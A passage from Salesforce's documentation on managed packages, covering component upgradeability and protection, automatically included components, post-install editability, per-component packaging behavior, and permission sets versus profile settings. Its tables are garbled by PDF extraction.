NoNoNoNoYesCustom Field

NoYesYes, if protectedNoYesCustom Label

NoNoNoNoYesCustom Object

NoNoNoNoYesCustom Report
Type

YesNoNoNoYesCustom Setting

NoNoYesYesNoDashboard

NoNoYesYesNoDocument

NoNoYesYesNoEmail Template

NoNoNoNoYesField Set

NoNoNoYesYesFlow

NoNoYesYesNoFolder

NoNoNoNoYesHome Page
Component

NoNoYesYesNoHome Page
Layout

NoNoYesYesNoLetterhead

NoNoYesYesNoList View

NoNoYesYesNoPage Layout

NoNoNoNoYesPermission Set
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IP ProtectionProtectableDeveloper
Deletable

Subscriber
Deletable

UpgradeableComponent

NoNoNoNoYesRecord Type

NoNoYesYesNoRemote Site
Setting

NoNoYesYesNoReport

NoNoNoNoYesS-Control

NoNoNoNoYesStatic Resource

NoNoNoNoYesTab

NoNoNoNoYesTranslation

NoNoNoNoYesValidation Rule

YesNoYes (if set to
public access)

NoYesVisualforce
Component

NoNoNoNoYesVisualforce Page

NoYesYes, if protectedNoYesWorkflow Email
Alert

NoYesYes, if protectedNoYesWorkflow Field
Update

NoYesYes, if protectedNoYesWorkflow
Outbound
Message

NoNoNoNoYesWorkflow Rule

NoYesYes, if protectedNoYesWorkflow Task

Component Attributes and Behaviors

Only some attributes of a component are upgradeable. Many components also behave differently or include additional
restrictions in a managed package. It's important to consider these behaviors when designing your package.

See Also:
Managing Packages

Protected Components
Developers can mark certain components as protected. Protected components can’t be linked to or referenced by components
created in a subscriber organization. A developer can delete a protected component in a future release without worrying about
failing installations. However, once a component is marked as unprotected and is released globally, the developer can’t delete
it.
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The developer can mark the following components as protected in managed packages.

• Custom labels

• Custom links (for Home page only)

• Workflow alerts

• Workflow field updates

• Workflow outbound messages

• Workflow tasks

See Also:
Managing Packages

Components Automatically Added to Packages
When adding components to your package, some related components are automatically added, if required. For example, if
you add a Visualforce page to a package that references a custom controller, that Apex class is also added.

To understand what components might be automatically included, review the following list:

These types of components might be automatically included:When you add this component:

Action target object (if it’s a custom object), action target field, action record type,
predefined field values, action layout; and any custom fields that the action layout or
predefined values refer to on the target object

Action

ReportsAnalytic Snapshot

Custom fields, custom objects, and other explicitly referenced Apex classes, as well as
anything else that is directly referenced by the Apex class

Apex class

Note: If an Apex class references a custom label, and that label has
translations, you must explicitly package the individual languages desired in
order for those translations to be included.

Custom fields, custom objects, and any explicitly referenced Apex classes, as well as
anything else that is directly referenced by the Apex trigger

Apex trigger

Custom fields, the default page layoutArticle type

Custom tabs (including web tabs), documents (stored as images on the tab), documents
folder

Custom app

Custom fields and custom objectsCustom button or link

Custom objectsCustom field

Custom home page components on the layoutCustom home page layouts

Apex sharing reasons, Apex sharing recalculations, Apex triggers, custom buttons or
links, custom fields, list views, page layouts, record types, validation rules

Custom settings
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These types of components might be automatically included:When you add this component:

Custom fields, validation rules, page layouts, list views, custom buttons, custom links,
record types, Apex sharing reasons, Apex sharing recalculations, and Apex triggers

Custom object

Note:

• Apex sharing reasons are unavailable in extensions.

• When packaged and installed, only public list views from an app are
installed. If a custom object has any custom list views that you want to
include in your package, ensure that the list view is accessible by all users.

Custom objects (including all of its components), s-controls, and Visualforce pagesCustom tab

Folders, reports (including all of its components), s-controls, and Visualforce pagesDashboard

FolderDocument

Folder, letterhead, custom fields, and documents (stored as images on the letterhead
or template)

Email template

Any referenced fieldsField set

Custom objects, custom fields, Apex classes, and Visualforce pagesFlow

Everything in the folderFolder

Custom buttons, custom links, s-controls, and Visualforce pagesPage layout

Folder, custom fields, custom objects, custom report types, and custom s-controlsReport

Custom fields and custom objectsS-control

Translated terms for the selected language on any component in the packageTranslation

Custom fields (referenced in the formula)Validation rule

Apex classes that are used as custom controllers, Visualforce custom components, and
referenced field sets

Visualforce pages

All associated workflow alerts, field updates, outbound messages, and tasks; also, if
the workflow rule is designed for a custom object, the custom object is automatically
included

Workflow rule

Note:  Some package components, such as validation rules or record types, might not display in the list of package
components, but are included and install with the other components.

See Also:
Managing Packages
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Editing Components and Attributes After Installation
The following table shows which components and attributes are editable after installation from a managed package. The
following sections describe the table columns and their values.

Developer Editable

The developer can edit the component attributes in this column. These attributes are locked in the subscriber's organization.

Subscriber and Developer Editable

The subscriber and developer can edit the component attributes in this column. However, they’re not upgradeable; only
new subscribers receive the latest changes.

Locked

Once a package is Managed - Released, the developer and subscriber cannot edit the component attributes in this column.

LockedSubscriber and Developer
Editable

Developer EditableComponent

Action •• Target Record Type All fields except Target
Record Type• Action layout

• Predefined values for
action fields

Analytic Snapshot •• Analytic Snapshot Unique
Name

All attributes except
Analytic Snapshot Unique
Name

Apex Class •• NameAPI Version

• Code

Apex Sharing Reason •• Reason NameReason Label

Apex Sharing Recalculation • Apex Class

Apex Trigger •• NameAPI Version

• Code

Application •• App NameAll attributes except App
Name

Article Types ••• NameAvailable for Customer
Portal

Description

• Label
• Channel Displays• Plural Label
• Default Sharing Model• Starts with a Vowel Sound

• Development Status
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LockedSubscriber and Developer
Editable

Developer EditableComponent

• Enable Divisions

• Grant Access Using
Hierarchy

• Search Layouts

Connected App ••• API NameACS URLAccess Method

• ••Canvas App URL Created Date/ByEntity ID

•• •IP RestrictionsCallback URL Consumer Key

••• Consumer SecretManage Permission SetsConnected App Name

• ••Contact Email Installed ByManage Profiles

•• •Mobile Start URLContact Phone Installed Date

••• Last Modified Date/ByPermitted UsersDescription

• ••Icon URL VersionRequire Users to Log In

•• SAML AttributesInfo URL

• •IP Ranges Service Provider
Certificate• Locations

• Start URL• Logo Image URL
• Subject Type• OAuth Scopes

Custom Button or Link ••• Display TypeHeightBehavior

• ••Button or Link URL NameResizeable

•• Show Address BarContent Source

• •Description Show Menu Bar

•• Show ScrollbarsDisplay Checkboxes

• •Label Show Status Bar

•• Show ToolbarsLink Encoding

• Width

• Window Position

Custom Field ••• Child Relationship NameChatter Feed TrackingAuto-Number Display
Format •• Data TypeHelp Text

• Decimal Places •• External IDMask Type
• Description •• Field NameMask Character
• Default Value •• RequiredSharing Setting
• Field Label •• Roll-Up Summary FieldSort Picklist Values
• Formula •• Roll-Up Summary ObjectTrack Field History
• Length • Roll-Up Summary Type
• Lookup Filter • Unique
• Related List Label

• Roll-Up Summary Filter
Criteria
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LockedSubscriber and Developer
Editable

Developer EditableComponent

Custom Label •• NameCategory

• Short Description

• Value

Custom Object ••• Object NameAllow ActivitiesDescription

• ••Label Record Name Data TypeAllow Reports

•• •Available for Customer
Portal

Plural Label Record Name Display
Format• Record Name

• Context-Sensitive Help
Setting

• Starts with a Vowel Sound

• Default Sharing Model

• Development Status

• Enable Divisions

• Grant Access Using
Hierarchy

• Search Layouts

• Track Field History

Custom Report Type ••• Report Type NameDevelopment StatusAll attributes except
Development Status and
Report Type Name

Custom Setting •• Object NameDescription

• •Label Setting Type

• Visibility

Dashboard •• Dashboard Unique NameAll attributes except
Dashboard Unique Name

Document •• Document Unique NameAll attributes except
Document Unique Name

Email Template •• Email Template NameAll attributes except Email
Template Name

Field Set ••• NameSelected fields (only
subscriber controlled)

Description

• Label

• Available fields

Flow ••• Flow Unique NameNameEntire flow

•• URLDescription

• Status
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LockedSubscriber and Developer
Editable

Developer EditableComponent

Folder •• Folder Unique NameAll attributes except
Folder Unique Name

Home Page Component •• NameBody

• •Component Position Type

Home Page Layout •• Layout NameAll attributes except
Layout Name

Letterhead •• Letterhead NameAll attributes except
Letterhead Name

List View •• View Unique NameAll attributes except View
Unique Name

Page Layout •• Page Layout NameAll attributes except Page
Layout Name

Permission Set •• NameDescription

• Label

• Custom object permissions

• Custom field permissions

• Apex class access settings

• Visualforce page access
settings

Record Type ••• NameActiveDescription

• •Record Type Label Business Process

All attributes except Remote
Site Name

Remote Site Setting • Remote Site Name

Report •• Report Unique NameAll attributes except
Report Unique Name

S-Control ••• S-Control NamePrebuild in PageContent

• •Description Type

• Encoding

• Filename

• Label

Static Resource •• NameDescription

• File
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LockedSubscriber and Developer
Editable

Developer EditableComponent

Tab •• Mobile Ready• Description Tab Name

•• Tab StyleEncoding

• Has Sidebar

• Height

• Label

• S-control

• Splash Page Custom Link

• Type

• URL

• Width

Translation • All attributes

Validation Rule ••• Rule NameActiveDescription

• Error Condition Formula

• Error Location

• Error Message

Visualforce Component •• NameAPI Version

• Description

• Label

• Markup

Visualforce Page •• NameAPI Version

• Description

• Label

• Markup

Workflow Email Alert •• DescriptionAdditional Emails

• Email Template

• From Email Address

• Recipients

Workflow Field Update ••• NameLookupDescription

• •Field Value Notify Assignee

• Formula Value

Workflow Outbound
Message

••• NameUser to Send AsDescription

• Endpoint URL

• Fields to Send

• Send Session ID
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LockedSubscriber and Developer
Editable

Developer EditableComponent

Workflow Rule ••• Description Rule NameActive

• Evaluation Criteria

• Rule Criteria

Workflow Task •• SubjectAssign To

• Comments

• Due Date

• Notify Assignee

• Priority

• Record Type

• Status

See Also:
Managing Packages

Component Behavior in Packages

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create AppExchange Packages”To create AppExchange packages:

When building an app for distribution, it is important to consider how packaging affects your app and its components. Use
the following information to help you determine what to include in your packages, how to design your app, and how to
distribute your packages (managed or unmanaged).

Note:

• For more information on the attributes and properties of each component in packages, see the ISVforce Guide.

• Component names must be unique within an organization. To ensure that your component names do not conflict
with those in an installer’s organization, use a managed package so that all of your component names contain your
namespace prefix.

Analytic Snapshot

Developers of managed packages must consider the implications of introducing analytic snapshots that reference reports
released in a previous version of the package. If the subscriber deleted the report or moved the report to a personal folder,
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the analytic snapshot referencing the report will not be installed, even though the Package Installation page may indicate
that it will be. Also, if the subscriber has modified the report, that report may return results impacting the information
displayed by the analytic snapshot. As a best practice, the developer should release an analytic snapshot and the related
reports in the same version.

Since the running user is selected by the subscriber, some analytic snapshot field mappings could become invalid if the
running user does not have access to source or target fields.

Apex Classes or Triggers

Any Apex that is included as part of a package must have at least 75% cumulative test coverage. Each trigger must also
have some test coverage. When you upload your package to AppExchange, all tests are run to ensure that they run
without errors. In addition, all tests are run when the package is installed in the installer’s organization. The installer
can decide whether or not to install the package if any tests fail.

Tip: To prevent naming conflicts, Salesforce recommends using managed packages for all packages that contain
Apex. This way, all of the Apex objects contain your namespace prefix. For example, if there is an Apex class
called MyHelloWorld and the namespace for your organization is OneTruCode, the class is referenced as
OneTruCode.MyHelloWorld.

Keep the following considerations in mind when including Apex in your package:
• Managed packages receive a unique namespace. This namespace is automatically prepended to your class names,

methods, variables, and so on, which helps prevent duplicate names in the installer’s organization.
• In a single transaction, you can only reference 10 unique namespaces. For example, suppose you have an object that

executes a class in a managed package when the object is updated. Then that class updates a second object, which in
turn executes a different class in a different package. Even though the second package wasn’t accessed directly by the
first, because it occurs in the same transaction, it’s included in the number of namespaces being accessed in a single
transaction.

• If you are exposing any methods as Web services, include detailed documentation so that subscribers can write external
code that calls your Web service.

• If an Apex class references a custom label, and that label has translations, you must explicitly package the individual
languages desired in order for those translations to be included in the package.

• If you reference a custom object’s sharing object (such as MyCustomObject__share) in Apex, this adds a sharing
model dependency to your package. You must set the organization-wide sharing default access level for the custom
object to Private in order for other organizations to install your package successfully.

• The code contained in an Apex class or trigger that is part of a managed package is automatically obfuscated and
cannot be viewed in an installing organization. The only exceptions are methods declared as global, meaning that
the method signatures can be viewed in an installing organization.

• You can use the deprecated annotation in Apex to identify global methods, classes, exceptions, enums, interfaces,
and variables that can no longer be referenced in subsequent releases of the managed package in which they reside.
This is useful when you are refactoring code in managed packages as the requirements evolve. After you upload
another package version as Managed - Released, new subscribers that install the latest package version cannot see
the deprecated elements, while the elements continue to function for existing subscribers and API integrations.

• Any Apex contained in an unmanaged package that explicitly references a namespace cannot be uploaded.

• Apex code that refers to Data Categories can’t be uploaded.

Apex Sharing Reasons

Apex sharing reasons can be added directly to a package, but are only available for custom objects.
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Connected Apps

• Subscribers or installers of a package can’t delete a Connected App by itself; they can only uninstall its package. A
developer can delete a Connected App after a package is uploaded as Managed - Released. The Connected App will
be deleted in the subscriber's organization during a package upgrade

• If you update a Connected App and include it in a new package version, upgrading that package in a customer
organization updates the existing Connected App.

• If you push upgrade a package containing a Connected App whose OAuth scope or IP ranges have changed from
the previous version, the upgrade will fail. This is a security feature, to block unauthorized users from gaining broad
access to a customer organization by upgrading an installed package. A customer can still perform a pull upgrade of
the same package; this is allowed because it’s with the customer’s knowledge and consent.

• You can add an existing Connected App (that is, one created prior to Summer ‘13) to a managed package. You can
also combine new and existing Connected Apps in the same managed package.

• For Connected Apps created prior to Summer ‘13, the existing install URL continues to be valid until you package
and upload a new version. Once you upload a new version of the package with an updated Connected App, the install
URL will no longer work.

Custom Fields

• Picklist field values for custom fields can be added, edited, or deleted by subscribers. A developer should carefully
consider this when explicitly referencing a picklist value in code. Picklist values can be added or deleted by the
developer. During a package upgrade, no new picklist values are installed into the subscriber’s organization for existing
fields. Any picklist values deleted by the developer are still available in the subscriber’s organization.

• Developers can add required and universally required custom fields to managed packages as long as they have default
values.

• Auto-number type fields and required fields cannot be added after the object is uploaded in a managed-released
package.

Custom Labels

If a label is translated, the language must be explicitly included in the package in order for the translations to be included
in the package. Subscribers can override the default translation for a custom label.

Custom Objects

• If a developer enables the Allow Reports or Allow Activities attributes on a packaged custom object, the
subscriber’s organization also has these features enabled during an upgrade. Once enabled in a managed-released
package, the developer and the subscriber cannot disable these attributes.

• Standard button and link overrides are also packageable.

Custom Report Types

A developer can edit a custom report type in a managed package after it is released, and add new fields. Subscribers
automatically receive these changes when they install a new version of the managed package. However, developers can’t
remove objects or fields from the report type once the package is released.

Custom Settings

• If a custom setting is contained in a managed package, and the Visibility is specified as Protected, the custom
setting is not contained in the list of components for the package on the subscriber's organization. All data for the
custom setting is hidden from the subscriber.
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Custom Tabs

• The Tab Style for a custom tab must be unique within your app. However, it does not need to be unique within
the organization where it is installed. A custom tab’s style will not conflict with an existing custom tab in the installer’s
environment.

• To provide custom tab names in different languages, from Setup, click Customize > Tab Names and Labels >
Rename Tabs and Labels.

• Subscribers cannot edit custom tabs in a managed package.

Customer Portal and Partner Portal

Packages referring to Customer Portal or partner portal fields are supported. The subscriber installing the package must
have the respective portal enabled to install the package.

Dashboard Components

Developers of managed packages must consider the implications of introducing dashboard components that reference
reports released in a previous version of the package. If the subscriber deleted the report or moved the report to a personal
folder, the dashboard component referencing the report is dropped during install. Also, if the subscriber has modified
the report, that report may return results impacting what information is displayed by the dashboard component. As a
best practice, the developer should release a dashboard and the related reports in the same version.

Divisions

• When divisions are enabled on a custom object in a package, the subscribing organization must have the divisions
feature enabled to install the package.

• Setting the division filter on a report does not cause a dependency. The setting is dropped when installed into the
subscriber’s organization.

• Summarizing by the object’s division field—for example, Account Division—in a report causes a dependency.

• If the object’s division field in a report is included as a column, and the subscriber’s organization does not support
divisions on the object, then the column is dropped during install.

• If you install a custom report type that includes an object’s division field as a column, that column is dropped if the
organization does not support divisions.

Field Dependencies

• Developers and subscribers can add, change, or remove field dependencies.

• If the developer adds a field dependency, it is added during installation unless the subscriber has already specified a
dependency for the same field.

• If a developer removes a dependency, this change is not reflected in the subscriber’s organization during an upgrade.

• If the developer introduces a new picklist value mapping between the dependent and controlling fields, the mapping
is added during an upgrade.

• If a developer removes a picklist value mapping, the change is not reflected in the subscriber’s organization during
an upgrade.

Field Sets

Field sets in installed packages perform different merge behaviors during a package upgrade:
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Then in the package upgrade:If a package developer:

The modified field is placed at the end of the upgraded
field set in whichever column it was added to.

Changes a field from Unavailable to Available for the
Field Set or In the Field Set

The new field is placed at the end of the upgraded field set
in whichever column it was added to.

Adds a new field

The field is removed from the upgraded field set.Changes a field from Available for the Field Set or In the
Field Set to Unavailable

The change is not reflected in the upgraded field set.Changes a field from In the Field Set to Available for the
Field Set (or vice versa)

Note:  Subscribers aren't notified of changes to their installed field sets. The developer must notify users—through
the package release notes or other documentation—of any changes to released field sets. Merging has the
potential to remove fields in your field set.

Once a field set is installed, a subscriber can add or remove any field.

Flows

• You can only package active flows. The active version of the flow is determined when you click to upload a package
version. The upload fails if there aren’t any active versions of the flow.

• If you want to update a managed package with a different flow version, activate that version and upload the package
again. You don’t need to add the newly-activated version to the package. However, if you activate a flow version by
mistake and upload the package, you’ll distribute that flow version to everyone. Be sure to verify which version you
really want to upload.

• In a development organization, you can’t delete a flow or flow version once you’ve uploaded it to a released or beta
managed package.

• You can’t delete flow components from Managed - Beta package installations in development organizations.

• You can’t delete a flow from an installed package. To remove a packaged flow from your organization, you must first
deactivate it, wait 12 hours, then uninstall the package.

• If you have multiple versions of a flow installed from multiple unmanaged packages, you can’t remove only one version
by uninstalling its package. Uninstalling a package—managed or unmanaged—that contains a single version of the
flow removes the entire flow, including all versions.

• Flows can’t be included in package patches.

• An active flow in a package will be active once installed. The previous active version of the flow in the destination
organization is deactivated in favor of the newly-installed version. Any in-progress flows based on the now-deactivated
version will continue to run without interruption, but will reflect the previous version of the flow.

• Upgrading a managed package in your organization installs a new flow version only if there is a newer flow version
from the developer. After several upgrades, you may end up with multiple flow versions

• If you install a package containing multiple flow versions in a fresh destination organization, only the latest flow
version included in the package is deployed.

• If you install a flow from an unmanaged package that has the same name but a different version number as a flow
already in your organization, the newly-installed flow becomes the latest version of the existing flow. However, if
the packaged flow has the same name and version number as a flow already in your organization, the package install
will fail. You can’t overwrite a flow.
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• The Cloud Flow Designer can’t open flows installed from managed packages.

Folders

• Components that Salesforce stores in folders, such as documents, cannot be added to packages when stored in personal
and unfiled folders. Put documents, reports, and other components that Salesforce stores in folders in one of your
publicly accessible folders.

• Components such as documents, email templates, reports, or dashboards are stored in new folders in the installer’s
organization using the publisher’s folder names. Give these folders names that indicate they are part of the package.

• If a new report, dashboard, document, or email template is installed during an upgrade, and the folder containing
the component was deleted by the subscriber, the folder is re-created. Any components in the folder that were
previously deleted are not restored.

• The name of a component contained in a folder must be unique across all folders of the same component type,
excluding personal folders. Components contained in a personal folder must be unique within the personal folder
only.

Home Page Components

When you package a custom home page layout, all the custom home page components included on the page layout are
automatically added. Standard components such as Messages & Alerts are not included in the package and do not
overwrite the installer’s Messages & Alerts. To include a message in your custom home page layout, create an HTML
Area type custom Home tab component containing your message, under Setup, in Customize > Home > Home Page
Components and add it to your custom home page layout.

Home Page Layouts

Once installed, your custom home page layouts are listed with all the subscriber’s home page layouts. Distinguish them
by including the name of your app in the page layout name.

List Views

List views associated with queues cannot be included in a package.

Multi-Currency

• If a subscriber installs a report or custom report type that includes an object’s currency field as a column, that column
is dropped if the subscriber’s organization is not enabled for multiple currencies.

• Referencing an object’s currency field in a report’s criteria—for example, Account Currency—causes a dependency.

• Summarizing by an object’s currency field in a report causes a dependency.

• Using a currency designation in a report criteria value—for example, “Annual Revenue equals GBP 100”—does not
cause a dependency. The report generates an error when run in the installers organization if it does not support the
currency.

• If an object’s currency field in a report is included as a column and the subscriber’s organization is not enabled for
multiple currencies, that column is dropped during install.

• If a subscriber installs a custom report type that includes an object’s currency field as a column, that column is dropped
if the organization is not enabled for multiple currencies.

Page Layouts

The page layout of the person uploading a package is the layout used for Group and Professional Edition organizations
and becomes the default page layout for Enterprise, Unlimited, and Developer Edition organizations.
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Page layouts should be packaged alongside complimentary record types if the layout is being installed on an existing
object. Otherwise, the installed page layouts must be manually applied to profiles.

If a page layout and a record type are created as a result of installing a package, then the uploading user’s page layout
assignment for that record type is assigned to that record type for all profiles in the subscriber organization unless a
profile is mapped during an install or upgrade.

Permission Sets

You can include permission sets as components in a package, with the following permissions and access settings:
• Custom object permissions

• Custom field permissions

• Apex class access

• Visualforce page access

Note:  Assigned apps and tab settings are not included in permission set components.

Use permission sets to install or upgrade a collection of permissions. In contrast to profile settings, permission sets don’t
overwrite profiles.

Person Accounts

Packages referring to fields related to person accounts on the Account object—for example, Is Person Account,
First Name, Last Name, or Title—cannot be uploaded.

Picklist Values

• Subscribers can rename or delete picklist field values. A developer should carefully consider this when explicitly
referencing a picklist field value in Apex.

• Picklist field values can be added or deleted in the developer’s organization. Upon upgrade, no new values are installed.
Any values deleted by the developer are still available in the subscriber’s organization until the subscriber deletes
them.

Profile Settings

Profile settings include the following for components in the package:
• Assigned apps

• Tab settings

• Page layout assignments

• Record type assignments

• Custom object permissions

• Custom field permissions

• Apex class access

• Visualforce page access

Profile settings overwrite existing profiles in the installer’s organization with specific permission and setting changes.

3827

Managing PackagesWorking with Packages



Record Types

• If record types are included in the package, the subscriber’s organization must support record types to install the
package.

• When a new picklist value is installed, it is associated with all installed record types according to the mappings
specified by the developer. A subscriber can change this association.

• Referencing an object’s record type field in a report’s criteria—for example, Account Record Type—causes a
dependency.

• Summarizing by an object’s record type field in a report’s criteria—for example, Account Record Type—causes
a dependency.

• If an object’s record type field is included as a column in a report, and the subscriber’s organization is not using record
types on the object or does not support record types, then the column is dropped during install.

• If you install a custom report type that includes an object’s record type field as a column, that column is dropped if
the organization does not support record types or the object does not have any record types defined.

Reports

If a report includes elements that cannot be packaged, those elements will be dropped or downgraded, or the package
upload will fail. For example:
• Hierarchy drill-downs are dropped from activity and opportunities reports.

• Filters on unpackageable fields are automatically dropped (for example, in filters on standard object record types).

• Package upload fails if a report includes filter logic on an unpackageable field (for example, in filters on standard
object record types).

• Lookup values on the Select Campaign field of standard campaign reports are dropped.

• Reports are dropped from packages if they have been moved to a private folder or to the Unfiled Public Reports
folder.

• When a package is installed into an organization that does not have Chart Analytics 2.0:

◊ Combination charts are downgraded instead of dropped. For example, a combination vertical column chart with
a line added is downgraded to a simple vertical column chart; a combination bar chart with additional bars is
downgraded to a simple bar chart.

◊ Unsupported chart types, such as donut and funnel, are dropped.

S-Controls

Only s-controls in unmanaged packages created before January 1st, 2010 can be installed by subscribers.

S-controls have been deprecated, and are superseded by Visualforce on page 3591 pages.

Translation Workbench

• If you have enabled the translation workbench and added a language to your package, any associated translated values
are automatically packaged for the appropriate components in your package. Make sure that you have provided
translations for all possible components.

• An installer of your package can see which languages are supported on the package detail page. The installer does
not need to enable anything for the packaged language translations to appear. The only reason installers may want
to enable the translation workbench is to change translations for unmanaged components after installation, override
custom label translations in a managed package, or to translate into additional languages.

• If you are designing a package extension, you can include translations for the extension components but not additional
translations for components in the base package.
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Validation Rules

For custom objects that are packaged, any associated validation rules are implicitly packaged as well.

Workflow

• Salesforce prevents you from uploading workflow alerts that have a public group, partner user, or role recipient.
Change the recipient to a user before uploading your app. During installation, Salesforce replaces that user with the
user installing the app, and the installer can customize it as necessary.

• Salesforce prevents you from uploading workflow field updates that change an Owner field to a queue. Change the
updated field value to a user before uploading your app. During installation, Salesforce replaces that user with the
user installing the app, and the installer can customize it as necessary.

• Salesforce prevents you from uploading workflow rules, field updates, and outbound messages that reference a record
type on a standard or managed-installed object.

• Salesforce prevents you from uploading workflow tasks that are assigned to a role. Change the Assigned To field
to a user before uploading your app. During installation, Salesforce replaces that user with the user installing the app,
and the installer can customize it as necessary.

• You can package workflow rules and all associated workflow actions, such as alerts and field updates. However, any
time-based triggers are not included in the package. Notify your installers to set up any time-based triggers that are
essential to your app.

• Workflow alerts, field updates, outbound messages, and tasks can be protected by the developer. For more information
on protected components, see Protected Components on page 3829.

• Developers can associate or disassociate workflow actions with a workflow rule at any time. These changes, including
disassociation, are reflected in the subscriber’s organization upon install. In managed packages, a subscriber cannot
disassociate workflow actions from a workflow rule if it was associated by the developer.

• References to a specific user in workflow actions, such as the email recipient of a workflow email alert, are replaced
by the user installing the package. Workflow actions referencing roles, public groups, account team, opportunity
team, or case team roles may not be uploaded.

• References to an organization-wide address, such as the From email address of a workflow email alert, are reset
to Current User during installation.

• On install, all workflow rules newly created in the installed or upgraded package, have the same activation status as
in the uploaded package.

See Also:
Managing Packages

Protected Components
Developers can mark certain components as protected. Protected components cannot be linked to or referenced by components
created in a subscriber organization. A developer can delete a protected component in a future release without worrying about
failing installations. However, once a component is marked as unprotected and is released globally, the developer cannot delete
it. Developers can mark the following components as protected in managed packages:

• Custom labels

• Custom links (for Home page only)

• Workflow alerts

• Workflow field updates
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• Workflow outbound messages

• Workflow tasks

Intellectual Property Considerations
The following information is important when considering your intellectual property and its protection.

• Only publish package components that are your intellectual property and that you have the rights to share.

• Once components are available on Force.com AppExchange, you cannot recall them from anyone who has installed them.

• The information in the components you package and publish may be visible to users on Force.com AppExchange. Use
caution when adding your code to a formula Visualforce page, or any other component that you cannot hide in your app.

• The code contained in Apex that is part of a managed package is automatically obfuscated and cannot be viewed in an
installing organization. The only exceptions are methods declared as global, meaning that the method signatures can be
viewed in an installing organization.

About Permission Sets and Profile Settings in Packages

Available in: Enterprise, Unlimited, and Developer Editions

Developers can use permission sets or profile settings to grant permissions and other access settings to a package. When
deciding whether to use permission sets, profile settings, or a combination of both, consider the similarities and differences.

Profile SettingsPermission SetsBehavior

What permissions and settings are
included?

• Assigned apps• Custom object permissions
• •Custom field permissions Tab settings

•• Page layout assignmentsApex class access
• •Visualforce page access Record type assignments

• Custom object permissions
Note:  Permission sets include
assigned apps and tab settings, • Custom field permissions

• Apex class accessbut these settings can’t be
packaged as permission set
components.

• Visualforce page access

Profile settings are applied to existing
profiles in the subscriber's organization

Yes.Can they be upgraded in managed
packages?

on install or upgrade. Only permissions
related to new components created as
part of the install or upgrade are applied.

Yes.Subscribers can edit permission sets in
unmanaged packages, but not in
managed packages.

Can subscribers edit them?
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Profile SettingsPermission SetsBehavior

Yes. Subscribers can clone any profile
that includes permissions and settings
related to packaged components.

Yes. However, if a subscriber clones a
permission set or creates one that's based
on a packaged permission set, it won't be
updated in subsequent upgrades. Only

Can you clone or create them?

the permission sets included in a package
are upgraded.

No.No. Also, you can’t include object
permissions for a custom object in a

Do they include standard object
permissions?

master-detail relationship where the
master is a standard object.

No.No.Do they include user permissions?

Yes. Profile settings are applied to
existing profiles in the subscriber's

No. Subscribers must assign permission
sets after installation.

Are they included in the installation
wizard?

organization on install or upgrade. Only
permissions related to new components
created as part of the install or upgrade
are applied.

None. In a subscriber organization, the
installation overrides the profile settings,
not their user licenses.

A permission set is only installed if the
subscriber organization has at least one
user license that matches the permission
set. For example, permission sets with

What are the user license requirements?

the Salesforce Platform user license aren't
installed in an organization that has no
Salesforce Platform user licenses. If a
subscriber subsequently acquires a license,
they must reinstall the package to get the
permission sets associated with the newly
acquired license.

Permission sets with no user license are
always installed. If you assign a
permission set with no user license, all of
its enabled settings and permissions must
be allowed by the user’s license, or the
assignment will fail.

Profile settings are applied to existing
profiles.

Subscribers must assign packaged
permission sets after installing the
package.

How are they assigned to users?

Best Practices

• Use permission sets in addition to packaged profiles so your subscribers can easily add new permissions for existing app
users.

• If users need access to apps, tabs, page layouts, and record types, don't use permission sets as the sole permission-granting
model for your app. Assigned apps and tab settings are available in the permission set user interface, but they aren’t included
in permission set package components.
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• Create packaged permission sets that grant access to the custom components in a package, but not standard Salesforce
components.

See Also:
Managing Packages

Viewing Package Details
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create AppExchange Packages”To create packages:

From Setup, click Create > Packages and click the name of a package to view its details, including any added components,
whether it is a managed package, if the package has been uploaded, and so on.

The detail page has the following sections:

• Package Detail

• Components tab

• Versions tab

• Patch Organizations tab

From the Package Detail page, you can do any of the following:

• Click Edit to change the package name, custom link that displays when users click Configure, or description.

• Click Delete to delete the package. This does not delete the components contained in the package but the components
will no longer be bundled together within this package.

• Click Upload to upload the package. You will receive an email when the upload is complete. For more information, see
Managing Versions on page 3879. For more information on the entire process, see Preparing Your Apps for Distribution
on page 3863.

• Optionally, you can enable, disable, or change the dynamic Apex and API access that components in the package have to
standard objects in the installing organization by using the links next to API Access.

Viewing Package Details
For package developers, the package detail section displays the following package attributes (in alphabetical order):

DescriptionAttribute

The type of access that the API and dynamic Apex that
package components have. The default setting is Unrestricted,

API Access

which means that all package components that access the API
have the same access as the user who is logged in. Click Enable
Restrictions or Disable Restrictions to change the API and
dynamic Apex access permissions for a package.
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DescriptionAttribute

The name of the developer that created this package, including
the date and time.

Created By

A detailed description of the package.Description

The language used for the labels on components. The default
value is your user language.

Language

The name of the last user to modify this package, including
the date and time.

Last Modified By

The username of the person who should receive an email
notification if an exception occurs in Apex  that is not caught

Notify on Apex Error

by the code. If you do not specify a username, all uncaught
exceptions generate an email notification that is sent to
salesforce.com. This is only available for managed packages.

Note: Apex can only be packaged from Developer,
Enterprise, and Unlimited Edition organizations.

The name of the package, given by the publisher.Package Name

The Apex code that runs after this package is installed or
upgraded. For more information, see Running Apex on
Package Install/Upgrade.

Post Install Script

Indicates whether this is a managed or unmanaged package.Type

The Apex code that runs after this package is uninstalled. For
more information, see Running Apex on Package Uninstall.

Uninstall Script

Viewing Package Components
For package developers, the Components tab lists every package component contained in the package, including the name
and type of each component.

Click Add to add components to the package on page 3810.

Note:

• Some related components are automatically included in the package even though they may not display in the
Package Components list. For example, when you add a custom object to a package, its custom fields, page layouts,
and relationships with standard objects are automatically included. For a complete list of components Salesforce
automatically includes, see Developing Packages for Distribution.

• When you package a joined report, each block is included in the package. Although the blocks appear in the
package as reports, when you click on a block, you see an error message that you have “insufficient privileges” to
view the report. This is expected behavior. Instead, click on the name of the joined report to run it.

Click View Dependencies to review a list of components that rely on other components, permissions, or preferences within
the package. An entity may include such things as an s-control, a standard or custom field, or an organization-wide setting
like multicurrency. Your package cannot be installed unless the installer has the listed components enabled or installed. For
more information on dependencies, see Understanding Dependencies on page 3846. Click Back to Package to return to the
Package detail page.
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Click View Deleted Components to see which components were deleted from the package across all of its versions.

The following component information is displayed (in alphabetical order):

DescriptionAttribute

Lists the actions you can perform on the component. The only
choice is Remove, which removes the component from an
unreleased package.

Action

Displays the version number of the package in which a
component exists.

Available in Versions

This column lists how a component was included in a package.
If the component was automatically included because it is

Included By

referenced by another component, this column lists the name
of the referencing component. If the component was added
by a developer, this column lists User Selected. If the
component was added in a prior version of this package, this
